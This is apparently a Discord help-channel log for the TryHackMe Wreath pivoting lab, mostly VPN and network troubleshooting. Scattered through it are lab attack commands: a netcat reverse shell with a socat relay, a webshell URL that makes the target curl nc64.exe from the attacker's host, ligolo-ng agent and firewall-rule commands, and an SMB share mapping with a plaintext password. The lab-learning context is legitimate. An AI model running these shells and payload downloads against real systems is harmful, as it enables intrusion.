- preferably, use THM AttackBox at the beginning; once it works, move to your own local VM if you like it better so
Please provide feedback, in particular if it works, as that would provide confidence the leave/join procedure indeed works
Thanks so much! When I was attempting it yesterday I was on the 10.200.85.X network. I’ll let you know in a bit
I forgot to ask about the 500 error: do you get it when you download after joining or only after regenerating?
Regenerating and just downloading
thank you @cerulean prawn
it work, successfully download VPN file
Gave +1 Rep to @cerulean prawn (current: #19 - 492)
Currently on task 33 and trying to import the port scanning script into memory but failed, i am sure the directory exist. Anyone has the same problem before?
nvm, i saw my mistake🤣 i thought i should load the script directly into the flag s
Hi all, anyone else get Git Lab login for task 17 on wreath network?
My redirect sends me here...
I mean, I'll tell you right now there ain't a Gitlab instance in that network lmao.
What's your output of ip r
I'd also be a little surprised if they were using 10.200.0.0/24 for this one, although the available subnets may have changed
are you asking for my pivot point or my own IP?
I'll give it all if you would like 🙂
Run ip r in your terminal and see what you get?
this is my Kali instance
Where are you getting 10.200.0.150 from?
Yeah, uh, maybe don't use the DNS config to identify the subnet
I know, but it was the easiest screenshot to show you, unless you want me to show the ping sweep results. 😦
Have a look at the routing on that box
And ping sweeping should come later -- you won't get very far ping sweeping the wrong subnet
Or scanning generally
Not sure what's actually meant to be on 10.200.0.150. Guessing just a regular THM instance.
ok, I will just leave the room and follow a different network then. I have been following the instructions from the room to learn pivoting and this is the subnet that I found.
Did, uh, it tell you to look at resolv.conf for your next hop?
It did not. Phew, thought 20 year old me might have been a bigger idiot of a teacher than I thought 
no worries, maybe tomorrow I will finally get a different instance. been working on this for 10 days at this point 😦 I am just very upset. It says to use nmap and gives examples based off of the room. these are the IPs I get back from. My notes are horrific (which is why I am trying to learn from this room) and I am just getting super emotional and cant think straight.
I've gone up to Task 12 twice I am just so lost right now.
It's all good 🙂
Have a look at ip route on the compromised server
That'll show you the routing configuration for that box, including the local subnet
yes, 10.201.134.0/24
ok, now I have 3 ips, just go from there?
I'd say so, yep
thank you
thank you.
Gave +1 Rep to @merry robin (current: #10 - 822)
Np 🙂
I could use a little help with getting the exploit working for the gitlab server. I've tried both curl and burp with no luck. I uploaded a standalone netcat onto the server and I know my port and listener are good, because I can revshell back to my machine. Both burp and curl time out with no response. I've noticed if I leave upgrade-insecure-request on in burp, I get TLS connection errors but I can get responses from a=whoami, a=hostname etc just fine. Can I please get some tips on what I'm doing wrong here?
Edit: In case someone is searching similar later, specifying task 20 and ip .150
I've tried restarting my machine, restarting the server, different ports, and even a different powershell rev shell. Still no luck
I can run ping on the gitserver but it doesn't seem like it can hit the prod server.
even more interesting, I can't ping git from prod either even though I'm connected through prod and can get git to send back hostname, whoami, etc
it is in the arp table though
works from git too
I can set up a webpage to download nc.exe on prod, but seems like git can't download from it. validated I can hit the web page from my machine.
Either the box is messed up or I'm missing something simple and probably obvious at this point.
¯_(ツ)_/¯
you could try the reset the network option but doing so you gotta "start from scratch"
yeah, i've done that a couple times now. Even swapped my VM out just to be sure. I'm half posting here cuz it helps me think to 'say' it and my SO probably doesn't want to hear me ramble anymore lol
heck, even socat port forward doesn't work. Tried the original exploit after setting up "./socat tcp-l:16000 tcp:<MY ATTACK BOX IP>:16000 &" with no success. but running "nc 127.0.0.1 16000 -e /bin/bash" from prod connects. I'm leaning towards a network issue but confused how I can reach git server in the first place since I'm using a shuttle tunnel through prod to hit it. I think it's time for a break.
how come you have a gitlab server on your Wreath instance?
check this message from Muiri, who is the creator of this network: #wreath-network message
maybe reading messages below from that one will clear some confusion
.150 has a hostname of git-serv
for the CI/CD network yes, for the Wreath network no
Where I say git server, Im referring to where I'm hitting 10.201.134.150
have you read the follow-up messages from Muiri?
I skimmed but I'm afk right now. I'll give it a more thorough read through when I get back to my computer. Thanks for linking it 🙂
Gave +1 Rep to @cerulean prawn (current: #16 - 549)
I don't think that's it. looks like Witty's problem was that they weren't using 10.201.134.0/24. I'm not hitting an actual git server. I was just referring to the box by name. I'm using the exploit suggested, the php file is being uploaded, and I can run some commands. I'm just not getting a response on my listener when I try to get a rev shell. It's like .200 and .150 can't actually talk to each other even though the only reason I can hit .150 is because I've got a sshuttle tunnel through .200
I reran the arp table check here on .150 and confirmed .200 was still listed. pings all time out when ran through the exploit.php. I can still get local info like what's in directories, user info, etc. I'd blame my tunnel, but if that were the issue then I don't think I'd be able to reach 150 at all and I know I opened the firewall port for my listener since I can reach things on that port from my attack machine.
Is there a reason why the git-server(.150) can scan the port of the wreath-pc(.100) while using static nmap binary on prod-server(.200) fail to scan the wreath-pc(.100)?
Try starting something like a webserver on prod-srv and see if you can hit it using certutil.exe or powershell.exe iwr. If not then it'll be a network issue. You're in one of the "new" subnets (10.201), which I know have been... problematic
Because that's how the "firewall" (security groups) are configured.
Pretty sure it's network then. I was trying to use powershell to download nc.exe into administrator's download folders and it was failing. Confirmed I could hit my web page on .200 from my attack box. Oh well, I'll just poke at it once in a while till it works lol. Thanks, I appreciate the follow up!
Gave +1 Rep to @merry robin (current: #10 - 826)
not getting anything in network vpn server (Access>network tab) no wreath nor holo
getting this
me neither
ah! wreath is there for me now
did you Join Room for wreath or holo? don't know if that has anything to do with it.
yes i already joined the room
nice but only for you lol
any idea whom do i contact for this stuff?
I joined the room, started it, and reset when it was 4/5
let me double check it
also note the pinned message in this discord channel by @cyan vine
@unborn shell are you able to use the AttackBox with it?
just curious if that works
it says network status : stopped for me idk why
attempting to start (give this popup: Uh-no! Failed to start the network.)
might be worth asking in #room-help or #room-bugs
refresh the page, and press start again
if that fails too, use the Options button to leave the room, and then join again: you will be assigned to a different network instance (i. e. third octet of IP addresses will be different), with the network in the state Running right away
yeah you have to leave and rejoin the room Wreath until you find a non broken room that allows you to start the network AND download the vpn configuration file
hi all, I was hoping someone may be able to point me in the right direction ref Wreath. Currently on task 20. trying to ping my device (ACK). set up sshuttle through the comp (COMP) device and can see the next device in the network (TARGET) and used the relevant exploit. I have opened up a port on the firewall but no ping seems to come through the tunnel to ACK. I can ping COMP. Am I missing something obvious?
why the hell am i failing to join this room its not even letting me join???
Do you have a streak of > 7?
No
could that be the problem ??
Yes.
Free users need a streak of > 7 to access some network rooms.
Oooh ok thanks.
Gave +1 Rep to @sharp ice (current: #1 - 3344)
No worries, this shows in some places, but not in others.
using netcat on pivoted system(1) throws of glibc error any alternative ways ?(socat isnt working either)
Use statically compiled versions.
@sharp ice i have the 7 days streak but I'm unable to download the configuration file for wreath network when i click the download button it's giving me 500 error
check this: #site-support message
wait for few mins after starting the network (wait for 5 mins or so it worked for me)
Followed the walkthrough and darksec video still not getting the reverse shell of 2nd machine in the network
thank
I do apologise if this is the wrong place to ask but I am trying to access thomas' website and I have already mapped the IP address to the domain in my /etc/hosts file, but it keeps on timing out. I have tried to ping the site and I have gotten 100% packet loss.
(Do forgive me it's been a while since I have been here.)
I have regenerated a new OVPN file as well so it's a new connection as well and should be resolving to the correct server.
In essence the connection keeps timing out.
use the Options button and press Leave, and then press Join a few minutes later: you will be assigned to a different network instance
try the pinging
if that fails regenerate the VPN file, and wait a few minutes to download the new config and have another go
if the above fails, repeat the process
did it solved by following the below steps? coz i am stuck on the same point
I haven't had a chance to try this out but I will in a moment
Thanks for sharing this with me, I'll give this a shot and report back
Gave +1 Rep to @cerulean prawn (current: #16 - 571)
Unfortunately I got this when I followed the same problem. Should I escalate this with the team?
I had pinged the front facing machine in the Lateral Movement and Pivoting network.
just checking the obvious:
- the Wreath network is in the state of Running, right?
- you have run the VPN specific for the Wreath network , right?
Not everything responds to pings.
Can't remember if I blocked that for the web server.
have you done the procedure to leave and join back multiple times?
currently, I have the network instance for 85 (third octet) as per screenshot
maybe you can repeat the leave/join more times hoping to land on that 85 instance that works for me (I know, this is frustrating)
referring to the previous message by Muiri, the screenshot also confirms the prod_serv machine responds to ping
I am connected to the Wreath network via OVPN file for said connection.
I'll have to review this when I have a bit more time. Unfortunately, it's really late in Aus right now and I am just glad I am not connecting via email lol 😅
I have tried doing this as well, but I'll keep going to see what I can do
between leaving and joining, allow enough time: I would say minutes, possibly 15 (several users report different timing)
also, when regenerating VPN config files, allow 1-2 minutes before downloading; also, check the new VPN file is different from the previous one (you can simply do that by comparing their MD5 hashes)
a few comments by Muiri in Discord seem to indicate access to Wreath, is at times ... special 🙃
In fairness, it always used to be fine. The underlying infrastructure seems to be... broken... though
getting this when trying to connect to the third system (using chisel and foxyproxy)
Tried
:using multiple different ports
It's a shame to be honest but it would be a good way for people who are planning to prep for the OSCP to cut their teeth on a multi-machine environment.
yo guys
I'm unable to download my wreath network openvpn file
says everytime 'unknown error occured'
I got the same trouble. A week ago everything went right.
i completed it yesterday😂 lemme know if u need assistance or something
Maybe you can tell me whether you had access to .100 machine. Yesterday, I couldn't.
Can anyone tell me why I cannot access http://10.200.84.100 after running chisel server and client and having configured Foxyproxy?
is it saying connection reset? (have u selected socks 5 on foxy proxy)
yes i did
after joining room and starting network wait for atleast 5 mins then try downloading it might work
Alright, will try that
NO way
Good day here
I am not able to connect to wreath network, each time I want to download it keeps giving me an error message. Is it just me or there is something with it
i am not able to download the vpn file
worked?
question
answer
u waited for 5-10 mins ? after joining the wreath room
Can anyone help me? I'm having trouble downloading the Wreath Network OpenVPN file because it shows "An unknown error occurred."
u waited for 5-10 mins ? after joining the wreath room(try this worked for me )
Hey, I am doing the wreath room. For that I am using my own Kali VM (latest version). I could successfully connect to the corresponding VPN.
So I compromised the first machine but I am losing the connection to it all the time. It just freezes for 5 - 10 minutes (due to spoiler alarm I will not tell what kind of connection I have). The corresponding IP address does not even respond to pings in this time range. It seems that the connection always freezes when hitting enter or tab for autocompletion. But I am not sure whether this is the case all the time. It's just an observation. Does anybody have the same issue? Thx
Hi guys! I have been able to compromise the first two machine i.e. webserver and gitserv. Transported the chisel script into gitserv , connected to my kali by forking through webserver using socat (binary, planted in binary). I was able to run nmap using proxychains4 to enumerate the last machine and found some open ports. But that was three weeks ago. When I started with it today, I can use chisel, socat, proxychains4 on the last pc (.100) but all the ports are responding closed. Even a reset of the network did not work. Can anyone help??
I am having trouble connecting to the vpn. it is timing out. any ideas?
It is happening for me as well. None of the network's VPN getting connected. Did you figure out solution? BTW I am on M2 Macbook
I had a question about the wreath box in the conduct it says the part about not messing with the box for other people is this still relevant for every use of the box even solo also could i be doing the same wreath box with someone?
yeah I am on m2 as well. still can't connect it's sad
The regular vpn works, just not this one.
I got this to work on a Kali VM on M2. Just cant run on base M2
True
oh really man. what do you use to run kali?
VMware Fusion
https://mac.getutm.app apparently this one is also good.
@merry robin please can you give some advice. I want to work on this room.
bro i got it to work if you need i can let you know how
Yes please?
so apparently they use a bad cipher, i checked the openvpn logs. By default openvpn newer versions don't accept it.
go to settings -> scroll down to advanced settings -> security level change it to insecure (-_-)
@merry robin would like to hear your thoughts on this. can you update the cipher algorithm on the vpn server side. Why do we have to use insecure settings to connect?
no problem man!
Lmk if you can access wreath network, as for me the IP isnt responding
looks like no 😦 on kali it is fine?
Yes
screw it bro, it's not working i'm gonna do some other room. i was really looking forward to it, but whatever
That is not something I have (or have ever had) any control over unfortunately. TryHackMe manages the underlying infrastructure -- I just built the content.
I use the present tense "manages" in the loosest possible sense. By the looks of things you've already found out why...
thanks for the reply man. Understood.
Gave +1 Rep to @merry robin (current: #10 - 856)
the room is great by the way I can't wait to work on it one day, you did a great job!
who would be a good person to contact about this? i can't get it to work on my mac and other users say the same thing.
is anybody able to access the first machine (prod_server) ?
Has anyone used ligolo-ng on this room? I am able to get the agent onto the prod machine and connect back to my proxy. But if I run ip route add x.x.x.0/24 dev ligolo it immediately disconnects the agent and I'm unable to even reach the prod machine.
There should be an easy fix for that.
First: tell me, why does it happen? Why does the connection drop?
If you can work that part out then the solution should be straightforward 🙂
Been scratching my head on that. One guess would be something to do with the fact I already have an ip route for that subnet via x.x.86.1 over tun0 which is why I can reach "prod" to begin with so maybe the connection drops because of a conflicting (or incorrect) change in routing? But I can't reach the other two and there are no other interfaces. /24 covers all 0-255 so not sure why I wouldn't be able to. I can clearly reach them from "prod" via an nmap -sn but that doesn't happen from my kali. I've used Ligolo several times on other boxes and to double proxy so I think it isn't my ability to use the tool but rather the networking that is tripping me up. Any help is appreciated! 😄
I was able to figure out! Shouldn't include what I'm trying to route through 😉 By using direct routing I was able to get it to work but I know I could have also just excluded it by adding a direct route via <gateway>. Thanks @merry robin for tipping me in the right direction.
Gave +1 Rep to @merry robin (current: #10 - 861)
That's exactly it -- well done! 😁
why is Wreath 45min this room is long af lol
Good point. I've changed it to 180.
Help me to setup my own kali vm
The vpn config file is not downloading
I tried re generating it
There seems to be a network connectivity issue by connecting both methods OpenVPN and Attackbox.
Really like the wreath room and Ive been practicing it for the last few weeks and everything has been working great!
UNTIL...suddenly it stopped working correctly a few days ago.
before posting this i did a good bit of trouble shooting and searching through the discord.
Also had the room reset twice by vote and it still has the same problem.
Here is what its doing...It works for about 30secs to a min and then stops.
I can do everything normally like ping, get a shell, connect to the webpage, or run exploits...but only for about 30 seconds
Then it stops responding again for a few minutes and will come back online for another 30 seconds, etc, etc
The directories and files i created are still on the box.
Sshuttle connects and the webpage down stream can still be reached...but it crashes again and again
@royal stump Tagging you because Im not on here often and dont know who the mods are or anything.
but i see you're pretty active so i figured you might know someone can help.
Thanks
Gave +1 Rep to @royal stump (current: #1 - 4469)
Try to re-generate vpn file
wow...i assumed because i was able to connect to the machine that vpn wasnt the problem.
But i regenerated as you suggested and it appears to be working again.
Learning lesson, Thanks!
Having trouble reaching the initial IP, I have tried to regen my ovpn config, I can't ping or nmap scan - It was working fine until I ran Nessus against it. Could this have borked it?
I can't really help with this, but I can confirm that I've seen previous reports of people having the exact same problem after running nessus on the target.
No worries! At least I know what the problem might be now 😆
Is there anyway to get it reset without the 5 votes?
ty!
Ah fixed it nvm
I'm trying to download the openVPN config, but it gets stuck on "Downloading file", and after 3 minutes or so this error pops up and nothing downloads.
I've tried regenerating the file multiple times
It seems to be a backend 504 gateway timeout
this has happened to me just now
did you find a fix?
Are you from the EU region?
```
C:\xampp\htdocs\resources\uploads>net use \10.50.66.214\share /USER:user "s3cureP@ssword"
net use \10.50.66.214\share /USER:user "s3cureP@ssword"
System error 6 has occurred.
The handle is invalid.
C:\xampp\htdocs\resources\uploads>
```
im having some trouble with this
its a smb share which wont seem to connect to the windows machine
This helped me:
Please try the following:
Go to the Network room
In the top right corner, press "options" -> "leave room"
Wait for 30 minutes
Re-join the room
Once you have rejoined the network, make sure to regenerate your new configuration file by heading to https://tryhackme.com/access, selecting the network from the drop-down, and finally clicking "regenerate"
Ensure to wait up to 2 minutes before downloading your OpenVPN file!
for fixing the vpn
didn't do it yet
you sure you have access to it?
i just used http instead
ive had issues with impacket smb shares in the past
not enough documentation online
http for shares?
oh yeah easy
is Sshuttle still works only on Linux targets?
.
Wreath OVPN file not downloading
Was able to download LateralMovement, and BreachingAD no issues
Tried Regenerate and still no luck
Reviewed the web request/ responses and only difference I saw was the ID ( 605a05f41789b962daf23e45 v. 62b779a82244211aa2c53453 ) and how the name of the OVPN file is appended to the username/account
Could it be an issue with CloudFlare hosting this specific file?
Tried on and off from my VPN
Tried via Kali VM
Tried via THM .ovpn in Kali
same
Quite old, but worked.
Leave room join again wait for 5-10 mins then try downloading the ovpn file
^ Try this @junior yacht
I can't join the room either. I tried leaving for 30 minutes, then tried regenerating & downloading, but I can't download the vpn for the Wreath network. any alternatives?
**Problem:** Been trying to use Ligolo-NG for this Wreath room and am now stuck on Task 34 to double-pivot to the .100 machine from admin user on .150 machine.
- I also don't understand the network configuration of why .100, .150, and .200 cannot already communicate if they are all on 10.200.81.0/24 subnet.
- Any insights or assistance is appreciated.
```
CMD (from Kali): listener_add --addr 0.0.0.0:7777 --to 127.0.0.1:7777 --tcp
CMD (from .150): netsh advfirewall firewall add rule name="Ligolo-r404" dir=in action=allow protocol=tcp localport=7777
CMD (from .150): .\ligolo-ng_agent_0.7.5_windows_amd64.exe -connect 10.200.81.200:7777 -ignore-cert
```
Resulting Error Message:
```
time="2025-06-01T19:09:33+01:00" level=error msg="Connection error: dial tcp [my-kali-ip]:7777: connectex: A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond."
time="2025-06-01T19:09:33+01:00" level=fatal msg="dial tcp [my-kali-ip]:7777: connectex: A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond."
```
--SOLVED--
- Needed to use the same port I was using on initial pivot through .200
I am facing this problem whenever I try to run nc on the compromised machine to get back a reverse shell, I am getting this error: ./nc: /lib64/libc.so.6: version `GLIBC_2.34' not found (required by ./nc). How can I solve it so that I am able to run this command and be able to get back a shell when I run the powershell command on burp?
That's not a statically linked version of netcat
Well solved!
To answer your other question (r/ why they can't all communicate):
The original network design called for three subnets
- DMZ (public webserver)
- Services (Git)
- User estate (PC).
That wasn't possible with the way THM networks are setup, so we spoofed it using one subnet and security groups.
So from a technical standpoint, the reason why they can't communicate is that there's a distributed firewall in the way.
From a storyline perspective it would have made more sense for them to be on different subnets
can you help me with the sshuttle, it's troubling me
So if I'm trying to pivot using Portforward, how should I do it?
In the Description:
"Access the website in your web browser (using FoxyProxy if you used the recommended forward proxy, or directly if you used a port forward)."
I'm trying through .200, but as you mentioned, they can NOT communicate. So what's the method with Portforward?
@young geyser hie 😊
hello people
i'm having trouble connecting the git-serv with the starkiller,........ task 27 , anyone
As I remember you need to connect to the first linux machine and create a tunnel that will give you access to the git machine, did you do that?
yes i did all that,.............
Hi all, please note that this network has now been converted to v2. V2 is THM's new network infrastructure that has improved stability and ensures that all users receive the same subnet.
If you refresh the page, you will be taken to a new network page and you may have to boot a new instance. Please make sure that you use the wreathv2 VPN profile when using the network. You can also use the tryconnectme script on the attackbox to debug your network connection
woo thanks very much i was having trouble with it , thanks
Gave +1 Rep to @soft loom (current: #31 - 316)
Please let us know how it is working for you now. 🙏
Just click your profile>access>left side networks n click the dropdown menu, click wreathv2 , regenerate, download config and connect
Awesome! 🥳
kkk they even introduced a new feature kkk the other tasks are locked now
Yeah, I see that is enabled now. It forces to do the tasks in order. Let me turn that off for the time being.
now that i'm connected, i can't get this http-hop listener to work 🥺
on powershell empire to connect to the .150 server
oi people, i've set up a chisel forward proxy and i need to access the web of .100 ,...................how do i set up foxy proxy
thx for this information, vpn works fine.
Are there problems in displaying the network status? I get a blank screen and no targets information is displayed (above the start/extend/reset/network uptime: 18min bar).
Gave +1 Rep to @soft loom (current: #31 - 320)
Can you send a screenshot here? Targets should show once you start answering questions in the room and have the network started
Mmm, and you say your VPN profile works? Can you send DM me the Remote IP in your VPN profile please? I will investigate what is happening there
It's showing me join the room I have click that button multiple times but still same issue
try to ping 10.200.180.200
or look at your vpn's ip address, use the third octet of your vpn's ip address and ping this ip 10.200.x.200
thx 👍 vpn was working and the problem that the targets were not shown is fixed now as well
Gave +1 Rep to @trail jungle (current: #2997 - 1)
Hie people
Hey is it just me or is the option to download the wreath network VPN just gone now?
Hi all, please note that we are aware of an issue with network infrastructure for wreath. We will be deploying a patch soon that will bring the wreath networks back online.
is wreath online again???
Don't think so. Still not working for me either. Been trying it for the last few days, still nada.
I was able to connect using the connection file called wreathv2
check on access via OpenVPN on networks tab there should be wreathv2
Nice! I downloaded a new vpn file yesterday and it didnt work. but i generated a new one again just now and its working.
It’s very unstable—only works randomly at times. I spent two days thinking the issue was on my machine before reading this.
Can you be a bit more specific on what issue you are facing?
The patch was deployed like 30 minutes after I sent that message, so would not affect you now.
I also havent been able to replicate stability issues from users.
The most common mistakes I see that affects stability:
- Using ping to test access. Do not assume ICMP traffic is allowed
- Running multiple VPN profiles at the same time. Often unintentional, but your previous run didn't actually exit, so now you have multiple VPNs running, consistently de-authing you. Use `ps aux | grep openvpn` and you should see a single line. If you see multiple, you are running it multiple.
- Consistent switching between your VM and attackbox for the reason mentioned above, they use the same VPN profile
- Losing a shell cause of a command running. Often when you try to run an interactive command in a non-interactive shell it kills it.
Some things to consider:
- Look at the output from running the VPN profile. If every 2 minutes it reauths, it means you are running multiple VPN profiles.
- You can ping the VPN server, since this server accepts it, which ends with .250
- If your home/work internet is unstable, your VPN will be unstable as well. Rather use the Attackbox then, which is hosted in AWS meaning your Web view will be unstable, but not the network connection itself.
If any of the above problems, a good measure is to regen the VPN profile, which will automatically deauth all running instances. And on the AttackBox, you can run tryconnectme from terminal, which will Debug your network connection
wreath is down for me 1 hour ago also
Hmm I was trying tunneling with ligolo and then crashed...
Check your ligolo config. It alters your network settings and if you are doing the routes wrong, you overwrite the VPN routes and it will go down for you
Oh I will check that today
hie guy's ,..... i managed to connect somehow and i'm trying to set up a reverse shell in task 41 but , after following everything , the shell can't spawn for some reason ???? i don't know why any clues
Ok so it looks like only prod-serv on wreath is active... The other machines shows as shut down even on the diagram. Please fix...
Hey, I'm almost done the network, but am stuck on getting a reverse shell for task 41.
My setup
I have set up a python server on port 80 (I tried 8080 too just in case) with a nc64.exe in the same directory.
I am using ligolo to set up a double pivot, but as everything else is working I'm not sure why this isn't.
The problem
In my browser I hit http://10.200.180.100/resources/uploads/shell-kalaimaranb25.jpeg.php?wreath=curl%20http://10.250.180.6:8080/nc64.exe%20-o%20c:\\windows\\temp\\nc-kalaimaranb25exe
The issue is that I see no output on my server and the file is not being uploaded. I thought it might be a connectivity issue, so I ran sudo tcpdump -i any port 80 -v to check if I was getting anything. And to my surprise, I did. I saw the http request come through. I pasted the whole output into gemini and apparently the windows machine is sending a Reset flag closing the connection.
Another thing to note is that when I try to run curl.exe (like certutil.exe), I get no output. Maybe curl isn't working? I'm really not sure what more I can do at this point. Could it be a network issue or am I doing something wrong here? Any help would be appreciated here 🙏
Well... I figured it out. It was because I was using ligolo-ng. There's some custom set-up that had to be done. For anyone else using ligolo, look at this site: https://www.stationx.net/how-to-use-ligolo-ng/. It's really helpful for debugging and has instructions for basically all the tasks in this network
Thanks, currently, the main issue I am facing is intermittent TLS handshake failures causing the VPN connection to drop and restart repeatedly. I have verified that only one OpenVPN process is running, so multiple simultaneous VPN instances are not the cause.
My home network is stable, and my firewall allows UDP port 1194 and ICMP traffic. However, I have not tested from a different network yet.
I appreciate the suggestion to regenerate the VPN profile; I have done this multiple times and switched regions, but the issue persists.
It may be related to my VM environment. I would highly appreciate any guidance or approaches to diagnose the connection issue.
For testing connectivity, I primarily use nmap scans instead of ping. Typical nmap output shows:
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in X seconds
Summary of relevant log entries:
Started OpenVPN: US-West.ovpn
TLS connection initiated with 54.193.240.194:1194
Peer verified, CN=server
Assigned IP: 10.2.54.205
Routes added: 10.10.0.0/16, 10.101.0.0/16, 10.103.0.0/16
TUN device: tun0, cipher: AES-256-CBC, auth: SHA512
[14:16:08] Inactivity timeout (--ping-restart), restarting
[14:17:09] TLS handshake failed (timeout)
[14:20:31] TLS handshake failed (timeout)
[14:21:32] TLS handshake failed (timeout)
[14:22:33] TLS handshake failed (timeout)
The VPN connection failed due to a TLS key negotiation timeout, triggering a soft restart. The client successfully reconnected to the VPN server at 54.193.240.194:1194 and reinitiated a TLS handshake. Certificate verification, key usage, and extended key usage checks all passed during the reconnection.
Thanks for the detailed feedback, appreciate it!
Just some more questions:
"I have done this multiple times and switched regions, but the issue persists." - The VPN profile we generate here is not region specific. Just a heads-up. For networks, it boots a completely new VPN server, which is why you have the separate OVPN file. Just checking, but:
- Which region are you?
- You are not running the THM VPN AND the Network VPN at the same time right? Cause I see this:
`Started OpenVPN: US-West.ovpn` which isn't the OVPN of the network? The network OVPN would be `wreath2.ovpn`
Gave +1 Rep to @alpine cradle (current: #3056 - 1)
hey, is this network still working fine? wanna start it tomorrow morning and practice pivoting for the eJPTv2
I was able to do the whole thing. If smt crashes real bad reset the network, but I think its good
Hey everybody !
I'm currently at the beginning of the Wreath network room and i connected to the network from my kali vm using the network VPN configuration file.
The material mentions the ip of the server that is the entrypoint for the attack is at the top of the page in the network panel, but neither the network nor host parts of that ip correspond to the network i'm on or the machines that i can see in it with an nmap scan. I just wanted to check in with you guys and make sure I wouldn't be running attacks against the wrong target or worse - as i understand this room is a shared network with other THM users - against other users machines. Have i got something configured wrong or is there an issue somewhere else ?
Hello everyone
I’m trying to solve wreath room in tryhackme but it seems that after i started the machine no Running status is shown on the top left of my screen and i don’t know why.
Notice that i’m connected to the wreath vpn
Anyone can help with that ?
The wreath first machine has no ping. I almost changed anything. Recreated the VPN the VPN is working and the website says I am connected to the VPN but. I have no ping from the first machine.
are you using the version 2 for the VPN?
2.6.14
Should I downgrade?
sorry, misunderstanding, I am referring to the VPN file you download from your access page on THM
check this previous message: #room-help message
there was a time where 2 different version of VPN files were available for Wreath, but this may have changed in the meantime
There is only one version of VPN for me and it is not working.
The last time that I done it was 2 VPN
I suggest you use the Options button to leave the room, then join again
on your access page, regenerate the VPN file, download and re-run openvpn
I did this too even resetting the progress.
I have all answers from my own notes. But I will redo it for training reasons.
can you share the output of your openvpn command
here is mine so we can compare
here is also my network topology
from the third screenshot, you can see I can ping the IP of prod-serv
Wreath VPN
I am not on the same network with that machine
comparing your output to mine:
- my output
2025-09-05 08:15:03 TCP/UDP: Preserving recently used remote address: [AF_INET]34.252.51.34:1194
2025-09-05 08:15:03 Socket Buffers: R=[212992->212992] S=[212992->212992]
2025-09-05 08:15:03 UDPv4 link local: (not bound)
2025-09-05 08:15:03 UDPv4 link remote: [AF_INET]34.252.51.34:1194
- in your output, the IP address is `52.49.253.40`, and that corresponds to the IP of the previous version of Wreath (the one before version 2)
can you double check that there is no `wreathv2` listed in your access page as per screenshot? make sure you scroll to the bottom of the drop-down list
I have no V2
It doesn't show up for me
leave the network again, allow for 5-10 minutes before joining again
If, after joining again, you are assigned the same network topology/same IPs, you did not wait long enough
to be on the safe side, delete browser cache and do hard refresh (Ctrl-F5)
regenerate VPN file, then download
hopefully a v2 has appeared for Wreath
I will do it.
I am now log out from THM and I reset the progress and leave the Wreath room.
I'll check on the outcome when I am back later 🙃
not working unfortunately 🙁
you landed on the same network instance?
I don't have that Wreathv2
it doesn't show up
Maybe I should contact the support
no v2, understood, and then when you run openvpn, and get "Initialization Sequence Completed" you have a tun0 interface, right?
does not matter, routing is handled on THM infrastructure
can you ping the IP of the prod-serv?
No ping
now it is coming
I have now the second vpn file
It show up on the website
thanks
Why did this happen?
this is interesting
dunno, but sometimes being stubborn helps 🙃
thanks a lot
Gave +1 Rep to @cerulean prawn (current: #13 - 762)
hello
i dont have connectivity between my pc and wreath i have connected with the vpn file but i cant ping to the wreath network
check the troubleshooting earlier today with Morteza, that started here: #wreath-network message
Hello , the openvpn file is active [2025-09-09 01:13:21 net_iface_up: set tun0 up]
but the pings arent working?
and yes im using [-wreath.ovpn]
[-wreathv2.ovpn] worked
kex
good evening!
I've been trying to join Wreath network room but the button to join doesn't work. Does someone know how to fix it?
unless you are a subscriber, you need a 7-day streak before you can join Wreath
hey guys
the Wreath network seems not to have a ping and also I need -Pn to scan it with nmap, also I need nmap to guess the OS the server is running but my scans come back with no OS, it also says too many fingerprints to guess for an OS, I have tried -O, -A, none of them work, visiting the IP also does not redirect me to thomaswreath.thm
also, I left the room reset the progress joined again but now, there is no wreathv2 and only wreath in the access page in the networks section.
Oh, guys, for anyone with the same problem:
- reset the progress
- leave room
- wait 4 - 6 minutes
- join again
- wait 6 - 7 minutes
- go to access page -> networks -> select wreath v2
- hit regenerate
- download and connect to vpn
- ping the ip you've been given in THM
- if ping works, then youre golden, if not, do all of that again 1 through 10.
my .150 host isn't pinging even for the prodserver. what i have to do?
.
Hey Guys, on the empire installation I am supposed to run:
sudo powershell-empire server and am supposed to get an output like:
[INFO]: Submodules auto update enabled. Loading.
[INFO]: No .git directory found. Skipping submodule fetch.
[INFO]: Checking submodules...
[INFO]: No .git directory found. Skipping submodule check.
[INFO]: Using mysql database.
[INFO]: Empire starting up...
[INFO]: v2: Loading listener templates from: /usr/share/powershell-empire/empire/server/listeners
[INFO]: v2: Loading stager templates from: /usr/share/powershell-empire/empire/server/stagers
[INFO]: v2: Loading bypasses from: /usr/share/powershell-empire/empire/server/bypasses
[INFO]: v2: Loading malleable profiles from: /usr/share/powershell-empire/empire/server/data/profiles
[INFO]: v2: Loading modules from: /usr/share/powershell-empire/empire/server/modules
[INFO]: Searching for plugins at /usr/share/powershell-empire/empire/server/plugins
[INFO]: Initializing plugin: Basic Reporting
[INFO]: Starkiller enabled. Loading.
[INFO]: Starkiller served at the same ip and port as Empire Server
[INFO]: Starkiller served at http://localhost:1337/
[INFO]: Started server process [7582]
[INFO]: Waiting for application startup.
[INFO]: Application startup complete.
[INFO]: Uvicorn running on http://0.0.0.0:1337 (Press CTRL+C to quit)
server>
but I dont get the server CLI, and also, when I run :
sudo powershell-empire client I get an error:
┌──(kali㉿kali)-[~/Empire-Cli]
└─$ sudo powershell-empire client
usage: empire.py [-h] {server,setup} ...
empire.py: error: argument subparser_name: invalid choice: 'client' (choose from server, setup)
what do I do?
Hi there, I'm trying to get socat working in steps 19/20 just for practice. Has anyone been successful using socat here? I keep spinning my wheels, just want to confirm it's me. Thanks!
several options, but to start fresh I suggest you do the following in the order:
- terminate THM AttackBox
- use the Options button to leave the room
- wait a few minutes to join the room again
- make sure the Wreath network is running
- start THM AttackBox
The wreath network is not working on the attack box
I already tried to reset the network, reset the room and leave the room and of course restart the attack box
But I just cant ping to 10.200.180.200
before a few weeks I remember it did worked
I tried nmap with -Pn but it return useless data so maybe it is not really up:
nmap -p-15000 -vv 10.200.180.200 -oG initial-scan -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2025-09-25 20:04 BST
mass_dns: warning: Unable to open /etc/resolv.conf. Try using --system-dns or specify valid servers with --dns-servers
